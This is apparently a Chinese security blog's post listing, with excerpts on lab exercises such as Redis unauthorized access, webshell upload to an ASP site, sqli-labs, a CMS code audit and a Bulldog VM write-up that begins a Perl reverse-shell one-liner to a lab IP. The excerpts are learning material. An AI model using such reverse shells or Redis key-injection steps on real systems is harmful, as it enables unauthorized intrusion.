- 博客(10)
- 收藏
- 关注
RSS订阅原创 w3af安装教程
注:参考教程https://blog.csdn.net/f786548139/article/details/80604586 !!!各种依赖关系 Web Application Attack and Audit Framework 基于python语言开发此框架的目标是帮助你发现和利用所有web应用程序漏洞9大类近150个pluginAuditInfr...
2018-12-28 09:27:02
3151
1
原创 dedecms v5.7越权漏洞复现
环境搭建:在win7x64上安装phpstudy将网站源码 放置于C:\phpStudy\PHPTutorial\WWW\dedecms并启动phpstudy 将运行模式放在系统服务上 应用从物理机上访问该地址的index.php网页 进行下一步继续设定数据密码为root管理员登陆 admin 密码 admin 点击继续即可完成搭站...
2018-12-28 09:24:26
1889
原创 Redies未授权访问
攻击机 kali目标机 centos 安装省略。。。启动ssh服务kali上进行解压文件 把tar.gz包进行 解压Tar zxfv tar.gzMakeMake install ./redis-cli -h 192.168.232.152 Ssh-keygen -t rsa Cat /root/.ssh/...
2018-12-28 09:20:43
346
原创 搭建web服务器asp网站传马
第一步 搭建web服务器 即 iis必须先挂载系统ISO镜像文件点下一步 安装 稍等片刻 即可安装成功点下一步 安装 稍等片刻 即可安装成功 将asp网站源码 复制到 C:\Inetpub\wwwroot\asp 第二步 搭建asp网站打开 IIS 管理器将web服务扩展中所有扩展 全部调成允许网站依靠 IP 端口 域名 ...
2018-12-28 09:18:28
3257
原创 sqllabs通关
sqli-labs通关url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码常用的写出来吧: 空格是%20,单引号是%27, 井号是%23,双...
2018-12-28 09:15:35
936
原创 XDcms订餐网站管理系统v1.0代码审计
实例分析讲解为您敲开代码审计大门分析目标XDcms订餐网站系统 v1.0XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整...
2018-12-28 09:09:36
1168
1
原创 bulldog漏洞利用
逐个去破解 发现之后的密码是sarah:bulldoglovernick:bulldog登录 成功之后 访问如下页面刷新一下 use Socket;$i="192.168.232.131";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conne...
2018-12-28 09:07:43
301
原创 2018.8.10 软件包安装
挂载光盘挂载成功应用程序与系统命令的关系文件位置系统命令:一般在/bin和/sbin目录中, 载为Shell内部指令 应用程序:通常在/usr/bin和/usr/sbn目景中主要用途系统命令:完成对系统的基本管理工作,例如IP配置工具 应用程序:完成相对独立的其他辅助任务,例如网页浏览器适用环境系统命令:一般只在字符操作界面中运行 应用程序:根据实际需要,有些程序可...
2018-12-28 09:04:09
125
原创 2018.8.6 Linux初识与安装
1、目前RHEL6默认的文件系统类型:EXT4,第四代扩展(Extended)文件系统,属于日志文件系统;SWAP,在Linux系统的变换分区中使用——为了解决虚拟内存的问题 Linux支持的其他文件系统类型:支持对FAT格式文件系统的读写;支持NTFS文件系统的读,默认不支持写;ReiserFS文件系统——完全平衡树结构来容纳数据,包括文件数据,文件名以及日志支...
2018-12-28 09:02:46
130
原创 2018.7.20Windows日志与审核
Windows日志与审核2018.7.20Windows事件日志简介位置 管理工具-事件查看器本质上是数据库:发生什么--什么时间-与谁有关-是否系统相关-访问什么资源共有五种事件级别:所有的事件必须只能拥有其中的一种事件级别成功的审核安全访问尝试,主要指安全性日志,所有的成功登录系统都会被记录为成功审核事件Windows日志文件文件名、结构、存储位置...
2018-12-28 09:00:29
1778
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人